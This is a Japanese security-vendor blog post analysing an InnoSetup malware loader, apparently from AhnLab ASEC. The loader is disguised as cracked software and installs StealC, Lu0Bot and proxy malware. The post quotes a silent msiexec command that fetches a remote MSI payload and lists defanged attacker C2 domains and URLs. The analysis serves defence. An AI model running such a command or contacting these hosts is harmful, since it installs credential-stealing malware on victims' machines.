AhnLab SEcurity intelligence Center(ASEC)では、クラックおよび商用ツールに偽装して配布されているマルウェアのうち、新たなタイプのマルウェアを確認した。当該タイプは実行後すぐに不正な振る舞いを行っていた従来のマルウェアとは異なり、インストーラー UI が出力され、ボタンをクリックしてインストールプロセスを進めた場合に不正な振る舞いを開始する。
また、事前に作成しておいたマルウェアを配布する一般的な方法ではなく、ユーザーがダウンロードリクエストを行った場合に直ちにマルウェアを作成し、レスポンスするものと推定される。そのため、ダウンロードのたびに同じ機能で異なるハッシュ値を持つマルウェアが作成され、ダウンロードされる。
マルウェアは C2 のレスポンスに従ってファイルをダウンロードしたあと実行でき、配布当時の確認の結果、情報窃取型マルウェアの StealC、感染システムを商用プロキシのリソースとして活用する Socks5Systemz、セキュリティ関連のブラウザプラグインに偽装して照会数を増やす Clicker などのマルウェアのインストールが確認された。また、有名なソフトウェアである Opera ブラウザと 360 Security 製品のインストールも確認された。
図1. マルウェア配布ページ
サンプル内部に挿入された C2 文字列には、ダウンロードリクエスト当時の Timestamp 値、接続国などの情報が含まれている。ダウンロードリクエストのたびにマルウェアを新規作成して配布するものと推定され、そのためにダウンロードのたびに異なる C2 URL を持ち、サンプル自体のハッシュも毎回異なる。
図2. マルウェアの C2 URL
すでにマルウェアをダウンロードした履歴がある IP アドレス環境では、一定期間マルウェアではなく正常な WinRAR インストーラーがダウンロードされることを確認した。マルウェアの追跡および解析を困難にするためと判断できる。
図3. ダウンロードされるマルウェア(上)と正常なファイル(下)
マルウェアは InnoSetup で製作されており、実行時に以下のようなインストール画面が表示され、Next ボタンを2回クリックすると不正な振る舞いを開始する。便宜上、ここでは「InnoLoader」と称する。
図4. マルウェアの実行画面
攻撃者は外部ネットワークに接続し、追加のインストーラーをダウンロードする機能を持つ InnoDownloadPlugin を使用した。
最初の C2 接続時にレスポンス値が「ok」の場合に不正な振る舞いを行うよう構成されている。だが、サンプルのダウンロード後に一定の時間が過ぎると C2 から「no」のレスポンスを返し、この場合は不正な振る舞いが実行されず、インストールプロセスが終了する。これも、解析を妨害するための目的と思われる。
図5. C2 レスポンス
C2 から ok のレスポンスを受信した場合、ファイル内部に定義された C2 URL に順次接続してダウンロード URL を取得し、当該 URL からファイルをダウンロードしたあと実行する。ダウンロード URL は C2 のレスポンスヘッダの Location 項目に位置する。このプロセスにおいて実行されるファイルには、正常なファイルとマルウェアが混在している。解析に使用されたマルウェアのサンプルは、合計6つの C2 URL を所有している。
図6. C2 のダウンロード URL レスポンス
ファイルのダウンロードおよび実行が完了したあとは、次の C2 URL に接続し、定義されたすべての C2 に接続するまで繰り返される。解析当時、マルウェアのサンプルが実行したファイルは以下の通りである。
| 1 | StealC 情報窃取型マルウェア | C2 URL | hxxp://monkeyagreement[.]fun/coo.php?paw=883174&spot=1&a=2857&on=444&o=1678 |
| Download URL | hxxp://240601155506901.try.kyhd08[.]buzz/f/fvgbm0601901.txt | ||
| Hash | 0738205d5a1472662b94561e004d9803 (BAT) | ||
| 2 | 不正なブラウザプラグイン | C2 URL | hxxp://monkeyagreement[.]fun/coo.php?paw=762694&spot=2&a=2857&on=458&o=1688 |
| Download URL | hxxps://cdn-edge-node[.]com/online_security_mkl.exe | ||
| Hash | ff640a60d25e4bcf1ef290c3d1893a17 (Dropper) | ||
| 3 | Opera ブラウザ(正常) | C2 URL | hxxp://monkeyagreement[.]fun/coo.php?paw=401610&spot=3&a=2857&on=420&o=1662 |
| 4 | Socks5Systemz | C2 URL | hxxp://monkeyagreement[.]fun/coo.php?paw=895836&spot=4&a=2857&on=418&o=1660 |
| Download URL | hxxps://song.oaksfoxes[.]ltd/tid/202.exe | ||
| Hash | 1b3ad155c454d3351cfc107344bc4ad5 (Dropper) f8bb5272ce5d5b2e767f85e788dd4c5c (Sock5Syetemz) | ||
| 5 | 360 Security(正常) | C2 URL | hxxp://monkeyagreement[.]fun/coo.php?paw=956684&spot=5&a=2857&on=460&o=1690 |
| 6 | Windows アップデートツール偽装 Adware | C2 URL | hxxp://monkeyagreement[.]fun/coo.php?paw=787557&spot=6&a=2857&on=244&o=331 |
| Download URL | hxxp://kapetownlink[.]com/installer.exe | ||
| Hash | fa24733f5a6a6f44d0e65d7d98b84aa6 (Dropper) 95007206c6b2407fb69748ef7c93612 (Adware) |
上記のうち、BAT ファイルから開始され実行される StealC 情報窃取型マルウェアが主となる。ユーザーの重要情報を窃取して C2 に転送するマルウェアであり、ブラウザに保存されたパスワード、暗号通貨ウォレット、FTP Mail などのアプリケーションログイン情報、特定のファイル、システム情報などが窃取されるおそれがある。活発に出回っている情報窃取型マルウェアの一種であり、以下のブログでも紹介されている。
InnoLoader からダウンロードされ実行される BAT ファイルは以下のように難読化されており、実行すると C2 から不正な MSI ファイルをダウンロードして実行する。
図7. 不正な BAT ファイルの中身
- 実行コマンド: “msiexec /i hxxp://240601155351354.try.kyhd08[.]buzz/f/fvgbm0601001.msi /qn”
MSI ファイルは Microsoft Visual C++ インストーラーに偽装していた。
図8. 不正な MSI ファイルのプロパティ
MSI を実行すると、TEMP パスに正常な Node.js 実行ファイルと難読化された不正なスクリプトを作成後、実行する。
- 812d99a3d89b8de1b866ac960031e3df (Node.js)
- 2e85211a7ab36e6d7e2a4a4b5d88b938 (Script)
図9. 不正なスクリプト(難読化を一部解除)
不正なスクリプトは Lu0Bot マルウェアであり、特定のルールに従って C2 URL を作成して接続を試みたあと、感染システムの情報を収集してコマンドを実行することがある。C2 通信時は UDP を使用する特徴がある。解析の過程で Lu0Bot が StealC マルウェアをダウンロードしたあと実行したことが確認された。この過程で TEMP パスの下位に DLL ファイルと TXT ファイルが作成され、特定の引数で DLL ファイルを実行すると最終的に StealC マルウェアが実行される。
StealC をインストールする Lu0Bot は持続性維持のために ProgramData ディレクトリの下位に自己複製を行ったあと、Startup フォルダーにショートカットを作成するため、注意が必要である。このマルウェアが実行されている場合、攻撃者はいつでも任意の追加マルウェアをインストールすることができる。
図10. Lu0Bot – StealC マルウェアの実行フロー
解析および追跡を困難にするため、非常に複雑な段階を経てマルウェアを実行することが確認されている。このマルウェアは現在でも活発に出回っており、C2 のレスポンス通りに振る舞いを実行できる特性上、攻撃者はいつでも任意の別のマルウェアをインストールすることができる。このように、攻撃者は解析と検知を妨害するために様々な手段を用いている。ファイルをダウンロードするときは公式の配布元を利用する必要があり、違法ツールは使用を控え、信頼できないページからダウンロードしたファイルは実行してはならない。
[IOC 情報]
AhnLab では、本文のマルウェアを以下のような検知名で検知している。
- Infostealer/Win.InnoLoader.R653716 (2024.06.13.02)
- Infostealer/Win.Stealc.R654152 (2024.06.19.00)
- Trojan/MSI.Stealc
- Trojan/BAT.Loader
InnoLoader C2 Domain
valuescent[.]website
caretouch[.]hair
whipunit[.]hair
eyesnose[.]hair
nightauthority[.]xyz
cattlebusiness[.]icu
monkeyagreement[.]fun
laughvein[.]hair
brotherpopcorn[.]website
selectionword[.]xyz ほか多数
MD5
- 0738205d5a1472662b94561e004d9803 (BAT)
- b4c9d60f0e2c57c34ec6cb4a564c7ee1 (MSI)
- 2e85211a7ab36e6d7e2a4a4b5d88b938 (Script, Lu0bot)
- 6b5730e49a37d6ffee273790449ac037 (DLL, StealC)
- 0283c9517cfb46faec1735262bd58654 (TXT, StealC)
C2
- hxxp://240601155506901.try.kyhd08[.]buzz/f/fvgbm0601901.txt (BAT)
- d9500682396017175017969210108a04a635094d7af3f018356690047bce5.aoa.aent78[.]sbs (Lu0bot)
- e38ee82150cc00a8627814c6.bag.sack54[.]net (Lu0bot)
- hxxp://93.123.39[.]135/129edec4272dc2c8.php (StealC)
関連 IOC および詳細な解析情報は、AhnLab の次世代脅威インテリジェンスプラットフォーム「AhnLab TIP」サブスクリプションサービスを通して確認できる。
The post ダウンロードするたびに新たに作成される InnoSetup マルウェア appeared first on ASECブログ.